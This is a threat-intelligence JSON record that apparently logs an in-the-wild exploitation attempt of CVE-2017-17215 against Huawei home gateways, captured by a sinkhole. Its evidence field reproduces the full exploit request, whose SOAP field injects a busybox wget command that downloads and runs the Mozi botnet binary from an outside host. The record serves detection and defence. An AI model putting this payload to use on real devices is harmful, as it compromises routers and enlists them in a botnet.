{"uuid": "f4f43160-12d2-41a0-9dcf-d016d5bd8761", "vulnerability": {"vulnId": "CVE-2017-17215", "altId": ["[]"]}, "gcve": {"origin_uuid": "1a89b78e-f703-45f3-bb86-59eb712668bd", "gna": 1, "object_uuid": "f4f43160-12d2-41a0-9dcf-d016d5bd8761"}, "status": {"exploited": true, "status_reason": "confirmed", "status_updated_at": "2026-03-12T10:42:33+00:00"}, "characteristics": {"severity": 100.0, "local_access_required": false, "remote_code_execution": true, "authentication_required": false}, "timestamps": {"asserted_at": "2026-03-12T10:42:33", "last_seen_at": "2026-03-12T10:42:33", "first_seen_at": "2026-03-12T10:42:33"}, "scope": null, "evidence": [{"type": "sinkhole", "source": "cti-feed.circl.lu", "signal": "in_the_wild_attempts", "confidence": 1.0, "details": {"note": "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nHost: 193.168.124.237:37215\r\nContent-Length: 601\r\nConnection: keep-alive\r\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n<s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\r\n<NewStatusURL>$(/bin/busybox wget -g 180.243.2.45:51387 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL>\r\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\r\n</u:Upgrade></s:Body></s:Envelope>"}}], "references": null}